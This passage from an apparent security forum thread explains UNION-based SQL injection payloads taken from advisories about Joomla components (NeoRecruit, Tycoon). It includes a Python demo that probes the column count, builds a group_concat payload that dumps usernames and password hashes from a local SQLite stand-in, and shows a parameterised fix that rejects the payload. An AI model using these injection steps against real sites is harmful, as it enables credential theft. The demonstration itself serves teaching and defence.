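The NeoRecruit payload above (and the Tycoon `-14 UNion Select 1,2,@@version` one before it) is a plain UNION-based injection: a negative id so the real query returns nothing, a UNION SELECT with exactly as many columns as the original query, and group_concat to pack every username:password pair into one column. The script below is an added example, not part of any of the advisories and not the component's real code. It assumes an in-memory SQLite stand-in (constructed `jos_users` and a 5-column `offers` table instead of the 25 columns the advisory pads with 1..25), shows how the column count is found with ORDER BY before the UNION is built, ports the MySQL `group_concat(username,char(58),password)` to SQLite's `||` form, and contrasts the string-concatenated query with the parameterised one that rejects the payload:

```python
import sqlite3

# Constructed stand-in schema (not the real Joomla/NeoRecruit schema).
SCHEMA = """
CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
INSERT INTO jos_users VALUES (62, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99:salt1');
INSERT INTO jos_users VALUES (63, 'editor', '098f6bcd4621d373cade4e832627b4f6:salt2');
CREATE TABLE offers (id INTEGER, title TEXT, location TEXT, salary TEXT, contact TEXT);
INSERT INTO offers VALUES (1, 'Backend developer', 'Jakarta', '1000', 'hr@example.invalid');
"""

SELECT_OFFER = "SELECT id, title, location, salary, contact FROM offers WHERE id="


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def offer_view_vulnerable(db, raw_id):
    """The pattern the advisory exploits: the id parameter is glued into the SQL."""
    return db.execute(SELECT_OFFER + raw_id).fetchall()


def offer_view_fixed(db, raw_id):
    """Hardened form: validate as an integer, then bind it as a parameter."""
    try:
        offer_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return db.execute(SELECT_OFFER + "?", (offer_id,)).fetchall()


def find_column_count(db, max_cols=40):
    """Step 1: a UNION must match the column count of the original SELECT.
    ORDER BY n works while n <= column count and errors once it exceeds it."""
    for n in range(1, max_cols + 1):
        try:
            offer_view_vulnerable(db, "1 ORDER BY %d" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_credentials(db):
    """Step 2: the advisory's payload, ported from MySQL to SQLite.
    MySQL's group_concat(username,char(58),password) becomes
    group_concat(username || char(58) || password). -9999 matches no real
    row, so the only row returned is the UNION row."""
    ncols = find_column_count(db)
    cols = ["%d" % i for i in range(1, ncols + 1)]
    cols[1] = "group_concat(username || char(58) || password)"
    payload = "-9999 UNION ALL SELECT %s FROM jos_users--" % ",".join(cols)
    rows = offer_view_vulnerable(db, payload)
    return payload, rows[0][1]  # 'admin:<hash>,editor:<hash>'


def fixed_rejects_payload(db):
    """True when the hardened handler refuses the same payload."""
    payload, _ = dump_credentials(db)
    try:
        offer_view_fixed(db, payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    print("columns:", find_column_count(db))
    payload, creds = dump_credentials(db)
    print("payload:", payload)
    print("dumped :", creds)
    print("fixed handler rejects it:", fixed_rejects_payload(db))
```

The 25 numbers in the advisory are the result of exactly this ORDER BY / column-count step against the real component; the column that ends up rendered on the page (2 here) is the one that receives group_concat, and the rest are filler.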
 

KALASH3R
New Member

Nice work, thank you.

God bless you.
 
[align=center]KALASH3R
I do not want side replies.
Regards
[/align]
 